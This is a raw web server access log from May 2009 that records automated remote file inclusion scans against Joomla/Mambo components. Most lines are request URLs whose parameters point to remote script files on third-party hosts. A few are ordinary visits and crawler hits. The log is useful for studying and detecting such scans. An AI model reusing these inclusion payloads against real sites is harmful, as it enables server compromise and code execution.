221.139.104.104 - - [30/May/2009:04:27:32 -0400] "GET /logs/access_log.Q109051600/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:27:43 -0400] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:27:43 -0400] "GET /logs/access_log.Q109052300%20%20///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:27:43 -0400] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:27:50 -0400] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:27:50 -0400] "GET /logs/access_log.Q109052300%20%20///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:27:51 -0400] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:28:02 -0400] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:28:02 -0400] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:28:02 -0400] "GET /logs/access_log.Q109052300///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:28:04 -0400] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:28:04 -0400] "GET /logs/access_log.Q109052300%20%20///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:28:04 -0400] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:28:06 -0400] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:28:06 -0400] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:28:06 -0400] "GET /logs/access_log.Q109052300///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:28:13 -0400] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:28:13 -0400] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:28:13 -0400] "GET /logs/access_log.Q109052300///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
221.139.104.104 - - [30/May/2009:04:28:19 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:28:20 -0400] "GET /logs/access_log.Q108070700%20%20///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:28:26 -0400] "GET /logs/access_log.Q108070700%20%20///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
221.139.104.104 - - [30/May/2009:04:28:37 -0400] "GET /logs/access_log.Q109051600%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:28:45 -0400] "GET /logs/access_log.Q108070700%20%20///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
93.38.80.233 - - [30/May/2009:04:28:53 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
93.38.80.233 - - [30/May/2009:04:28:53 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
83.143.81.26 - - [30/May/2009:04:29:05 -0400] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:29:09 -0400] "GET /logs/access_log.Q109052300///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:29:09 -0400] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:29:09 -0400] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:29:09 -0400] "GET /logs/access_log.Q109052300///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:29:10 -0400] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:04:30:05 -0400] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:04:30:05 -0400] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:04:30:06 -0400] "GET /logs/access_log.Q109052300%20%20///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:30:17 -0400] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:30:17 -0400] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:30:17 -0400] "GET /logs/access_log.Q109052300///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:30:25 -0400] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:30:26 -0400] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:30:26 -0400] "GET /logs/access_log.Q109052300///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:30:27 -0400] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:30:27 -0400] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:04:30:27 -0400] "GET /logs/access_log.Q109052300///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
222.231.1.87 - - [30/May/2009:04:30:29 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dhcom.co.kr/pds/photo/child.gif??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
222.231.1.87 - - [30/May/2009:04:30:29 -0400] "GET /logs/access_log.Q109051700//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dhcom.co.kr/pds/photo/child.gif??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
222.231.1.87 - - [30/May/2009:04:30:29 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dhcom.co.kr/pds/photo/child.gif??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
222.231.1.87 - - [30/May/2009:04:30:39 -0400] "GET /logs/error_log.Q109051000//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dhcom.co.kr/pds/photo/child.gif??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
85.17.162.28 - - [30/May/2009:04:30:59 -0400] "GET /logs/access_log.Q108070700%20%20///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
66.249.67.16 - - [30/May/2009:04:31:07 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3081C9431801D7004A6D043+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.17.162.28 - - [30/May/2009:04:31:07 -0400] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:04:31:07 -0400] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:04:31:15 -0400] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:04:31:15 -0400] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:04:31:17 -0400] "GET /logs/access_log.Q109052300///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:04:31:19 -0400] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:04:31:22 -0400] "GET /logs/access_log.Q109052300///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:04:31:22 -0400] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:04:31:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.17.162.28 - - [30/May/2009:04:32:57 -0400] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:04:32:57 -0400] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:04:33:04 -0400] "GET //include/admin.lib.inc.php?site_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:04:33:04 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:04:33:05 -0400] "GET /logs/access_log.Q109052200//include/admin.lib.inc.php?site_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:04:33:14 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:04:33:27 -0400] "GET //include/admin.lib.inc.php?site_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:04:33:28 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:04:33:28 -0400] "GET /logs/access_log.Q109052200%20%20//include/admin.lib.inc.php?site_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
222.231.1.87 - - [30/May/2009:04:33:33 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 219 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
222.231.1.87 - - [30/May/2009:04:33:33 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
77.79.246.241 - - [30/May/2009:04:33:34 -0400] "GET /logs/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:33:34 -0400] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:33:34 -0400] "GET /logs/access_log.Q109052200/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:04:33:38 -0400] "GET /logs/access_log.Q109051700%20%20//include/admin.lib.inc.php?site_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:04:33:49 -0400] "GET //include/admin.lib.inc.php?site_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:04:33:49 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:04:33:49 -0400] "GET /logs/access_log.Q109052200//include/admin.lib.inc.php?site_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:33:52 -0400] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:33:52 -0400] "GET /logs/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:33:52 -0400] "GET /logs/access_log.Q109052200/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:33:53 -0400] "GET /logs/access_log.Q109051100/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
216.119.103.12 - - [30/May/2009:04:33:53 -0400] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.119.103.12 - - [30/May/2009:04:33:53 -0400] "GET /logs/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
216.119.103.12 - - [30/May/2009:04:33:53 -0400] "GET /logs/access_log.Q109052200/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:33:54 -0400] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:33:54 -0400] "GET /logs/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:33:54 -0400] "GET /logs/access_log.Q109052200/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
216.119.103.12 - - [30/May/2009:04:33:54 -0400] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.119.103.12 - - [30/May/2009:04:33:55 -0400] "GET /logs/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
216.119.103.12 - - [30/May/2009:04:33:55 -0400] "GET /logs/access_log.Q109052200/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:04:33:57 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:34:11 -0400] "GET /logs/access_log.Q109051100/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:04:34:11 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:04:34:11 -0400] "GET /logs/access_log.Q109051500%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:04:34:11 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:34:12 -0400] "GET /logs/access_log.Q109051100/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
216.119.103.12 - - [30/May/2009:04:34:18 -0400] "GET /logs/access_log.Q109051100/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
216.119.103.12 - - [30/May/2009:04:34:19 -0400] "GET /logs/access_log.Q109051100/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:04:34:22 -0400] "GET /logs/access_log.Q109052100%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:34:31 -0400] "GET /logs/access_log.Q109052200%20%20/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:34:39 -0400] "GET /logs/access_log.Q109051100%20%20/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:34:41 -0400] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:34:41 -0400] "GET /logs/access_log.Q109052200/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:34:41 -0400] "GET /logs/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:34:56 -0400] "GET /logs/access_log.Q109052200%20%20/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:34:57 -0400] "GET /logs/access_log.Q109052200%20%20/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:34:58 -0400] "GET /logs/access_log.Q109051100/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:35:04 -0400] "GET /logs/access_log.Q109051100%20%20/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:35:05 -0400] "GET /logs/access_log.Q109051100%20%20/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
64.6.231.215 - - [30/May/2009:04:35:10 -0400] "GET ///////////////////////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.waisikkai.com//components/com_registration/test.txt??? HTTP/1.1" 200 477 "-" "Mozilla/3.0 (OS/2; U)"
